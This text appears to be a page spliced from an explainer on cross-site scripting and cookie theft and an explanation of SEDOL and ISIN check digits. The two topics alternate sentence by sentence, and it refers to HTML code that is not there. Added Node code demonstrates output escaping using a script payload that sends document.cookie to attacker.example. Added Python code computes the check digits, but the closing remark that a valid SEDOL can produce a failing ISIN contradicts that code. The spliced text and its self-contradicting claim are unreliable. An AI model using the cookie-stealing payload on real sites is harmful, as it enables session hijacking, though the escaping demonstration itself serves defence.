In general, an XSS attack involves three actors: the website, the victim, and the attacker.
In this example, we will assume that the attacker's ultimate goal is to steal the victim's cookies by exploiting an XSS vulnerability in the website.
As it turns out, there are at least two common ways of causing a victim to launch a reflected XSS attack against himself. These two methods are similar, and both can be more successful with the use of a URL shortening service, which masks the malicious string from users who might otherwise identify it.
DOM-based XSS is a variant of both persistent and reflected XSS.
For British securities, SEDOLs are converted to ISINs by padding the front with two zeros, then adding the country code on the front and the ISIN check digit at the end.
In the example below, a simple server-side script is used to display the latest comment on a website.
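To make the failure concrete, here is an added example (not code from the original page) that models the "display the latest comment" script in plain JavaScript, runnable under Node without a browser. The function names, the page template and the cookie-stealing sample comment are constructed for this example, and the exfiltration host `attacker.example` is a placeholder.

```javascript
// Added example, not the page's own code: a minimal model of a server-side
// script that renders the latest comment, first without and then with output
// encoding. Function names and sample data are constructed for this example.

// Unsafe rendering: the comment is concatenated straight into the HTML, so
// anything the commenter typed, including <script> tags, becomes markup.
function renderLatestCommentUnsafe(comment) {
  return '<html><body><div id="latest-comment">' + comment + '</div></body></html>';
}

// Escape the five characters that can change the meaning of HTML text or
// attribute content, so user input is rendered as literal text.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: same page, but the comment is escaped before insertion.
function renderLatestCommentSafe(comment) {
  return '<html><body><div id="latest-comment">' + escapeHtml(comment) + '</div></body></html>';
}

// Crude detector used for the demonstration: is there an un-escaped <script tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample input: a comment carrying a cookie-exfiltration payload
// of the kind the text describes. attacker.example is a placeholder host.
const MALICIOUS_COMMENT =
  '<script>new Image().src="http://attacker.example/?c="+encodeURIComponent(document.cookie)</script>';

console.log('unsafe output contains live <script>:',
  containsScriptTag(renderLatestCommentUnsafe(MALICIOUS_COMMENT)));   // true
console.log('escaped output contains live <script>:',
  containsScriptTag(renderLatestCommentSafe(MALICIOUS_COMMENT)));     // false
```

Two practitioner caveats: `escapeHtml` is correct only for HTML text and quoted attribute values; a comment inserted into a `<script>` block, an event-handler attribute or a URL needs the encoding for that context instead. Separately, marking the session cookie `HttpOnly` keeps `document.cookie` from exposing it, which blunts this particular payload even where an injection remains.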
Each of the resulting character values is then multiplied by the weight for its position, and the products are summed to give the weighted sum.
The check digit is chosen so that the weighted sum of all seven characters, check digit included, is a multiple of 10; it can therefore be calculated from the weighted sum of the first six characters as (10 − (weighted sum modulo 10)) modulo 10.
Once the attacker has acquired the cookies, he can use them to impersonate the victim and launch further attacks.
From now on, the HTML code above will be referred to as the malicious string or the malicious script.
SEDOLs serve as the National Securities Identifying Number for all securities issued in the United Kingdom and are therefore part of the security's ISIN as well.
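The following is an added example (not code from the original page) that implements both the SEDOL check-digit rule described above and the SEDOL-to-ISIN conversion for British securities described earlier. This excerpt does not list the position weights or the letter values, so the code assumes the standard SEDOL weights 1, 3, 1, 7, 3, 9 (with weight 1 on the check digit itself), letter values A=10 through Z=35 with vowels disallowed, and the standard Luhn algorithm for the ISIN check digit. The function names are this example's own, and the sample identifiers are inputs whose check digits the arithmetic itself verifies.

```python
# Added example, not the page's own code: SEDOL check digit and SEDOL -> ISIN.
# Assumptions not stated in the excerpt: standard SEDOL weights 1,3,1,7,3,9
# (check digit weight 1), letter values A=10 .. Z=35 with no vowels, and the
# standard Luhn check digit for ISINs. Function names are this example's own.
import string

SEDOL_WEIGHTS = (1, 3, 1, 7, 3, 9)  # weights for the six body characters


def _letter_or_digit_value(ch: str) -> int:
    """Digits keep their value; letters map to 9 + alphabet position (A=10 .. Z=35)."""
    if ch in string.digits:
        return int(ch)
    if ch in string.ascii_uppercase:
        return ord(ch) - ord("A") + 10
    raise ValueError(f"invalid character {ch!r}")


def sedol_char_value(ch: str) -> int:
    """SEDOL character value; vowels are never used in SEDOLs, so reject them."""
    ch = ch.upper()
    if ch in "AEIOU":
        raise ValueError(f"vowel {ch!r} is not a valid SEDOL character")
    return _letter_or_digit_value(ch)


def sedol_check_digit(body: str) -> str:
    """Check digit for the first six SEDOL characters.

    The check digit's own weight is 1, so making the seven-character weighted
    sum a multiple of 10 reduces to (10 - (sum mod 10)) mod 10, as in the text.
    """
    body = body.upper()
    if len(body) != 6:
        raise ValueError("SEDOL body must be exactly 6 characters")
    weighted = sum(sedol_char_value(c) * w for c, w in zip(body, SEDOL_WEIGHTS))
    return str((10 - weighted % 10) % 10)


def is_valid_sedol(sedol: str) -> bool:
    """True when the 7-character SEDOL's last character is the correct check digit."""
    sedol = sedol.upper()
    if len(sedol) != 7 or sedol[6] not in string.digits:
        return False
    try:
        return sedol_check_digit(sedol[:6]) == sedol[6]
    except ValueError:
        return False


def isin_check_digit(payload: str) -> str:
    """Luhn check digit over the 11-character payload with letters expanded to digits."""
    expanded = "".join(str(_letter_or_digit_value(c)) for c in payload.upper())
    digits = [int(d) for d in expanded]
    total = 0
    # Walking from the right, double every other digit starting with the
    # rightmost one (the position adjacent to the check digit).
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def sedol_to_isin(sedol: str, country: str = "GB") -> str:
    """Pad the 7-char SEDOL to a 9-char NSIN, prefix the country, append the ISIN check digit."""
    if not is_valid_sedol(sedol):
        raise ValueError(f"{sedol!r} is not a valid SEDOL")
    payload = country.upper() + "00" + sedol.upper()
    return payload + isin_check_digit(payload)


if __name__ == "__main__":
    # Sample identifiers constructed for this example; the arithmetic verifies them.
    for s in ("0263494", "B0YBKJ7", "0263495"):
        print(s, "valid" if is_valid_sedol(s) else "INVALID check digit")
    print("0263494 ->", sedol_to_isin("0263494"))
```

The two check digits protect against different things: the SEDOL digit catches transcription errors in the seven-character code, while the ISIN digit is recomputed over the whole twelve-character string, so a SEDOL that validates on its own can still produce an ISIN that fails once the country prefix and padding are included.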